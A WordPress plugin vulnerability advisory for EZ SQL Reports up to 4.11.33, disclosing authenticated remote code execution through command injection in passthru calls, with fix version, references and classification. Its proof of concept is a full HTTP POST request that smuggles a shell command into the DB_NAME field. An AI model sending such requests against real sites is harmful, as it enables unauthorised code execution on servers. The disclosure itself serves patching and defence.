EZ SQL Reports <= 4.11.33 - Authenticated Arbitrary Code Execution



Description
There are several calls to "passtthru" in the code, one of them is receiving the username, password, database name and host from the $_POST arguments, so you can inject in every of this parameter the ";" character or others like "&&" or "||" to execute other distinct commands to "/usr/bin/mysql".
Proof of Concept
POST /wp-admin/admin.php?page=ELISQLREPORTS-settings HTTP/1.1
Host: <wordpress web>
Proxy-Connection: keep-alive
Content-Length: 177
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://<wordpress web>
Upgrade-Insecure-Requests: 1
User-Agent: <the user agent>
Content-Type: application/x-www-form-urlencoded
Referer: http://<wordpress web>/wp-admin/admin.php?page=ELISQLREPORTS-settings
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_8fa[...etc...]b7d
 
DB_NAME=<the db
name>%3B+touch+testrce.txt%3B+&DB_HOST=127.0.0.1&DB_USER=<theuser>&DB_PASSWORD=<thepassword>&db_date=z.2015-08-27-20-22-29.manual.wp.127.0.0.1.sql.zip&db_nonce=au78c5ff86

Affects Plugin

fixed in version 4.11.37

References

EXPLOITDB 38176

Classification

Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94

Miscellaneous

Submitter Felipe Moline
Submitter Twitter felmoltor
Views 1291
Verified No
WPVDB ID 8185

Timeline

Publicly Published 2015-09-14 (over 3 years ago)
Added 2015-09-15 (about 3 years ago)
Last Updated 2015-09-15 (about 3 years ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.